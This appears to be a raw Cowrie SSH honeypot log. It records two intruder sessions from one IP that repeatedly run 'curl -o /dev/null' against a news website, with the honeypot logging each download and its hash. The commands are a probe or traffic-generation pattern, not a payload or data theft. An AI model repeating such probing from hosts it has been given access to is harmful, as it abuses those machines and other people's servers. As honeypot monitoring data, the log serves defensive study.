{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.599931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.606730Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.607487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.612353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.630606Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.636647Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.637800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.638425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.647633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.648293Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.670971Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.673808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.674508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.682913Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.684633Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.688216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.689061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.700326Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.710355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.710989Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.726114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.727043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.740581Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.747669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.748447Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.753856Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.760305Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.766177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.766823Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.779766Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.784676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.785312Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.794475Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.804495Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.805617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.806269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.819929Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.820807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.852770Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.853655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.861329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.861993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.888644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.895270Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.896600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.897316Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.903172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.904226Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.918449Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.923753Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.940049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.940923Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.946048Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.946775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.950437Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.955168Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.979893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.980819Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.984143Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.984939Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.012309Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.015042Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.023704Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.033434Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.034463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.037511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.038985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.049351Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.074455Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.075417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.078980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.079809Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.085828Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.088039Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.091924Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.097801Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.115662Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.116568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.121926Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.122861Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.149782Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.156194Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.157082Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.161646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
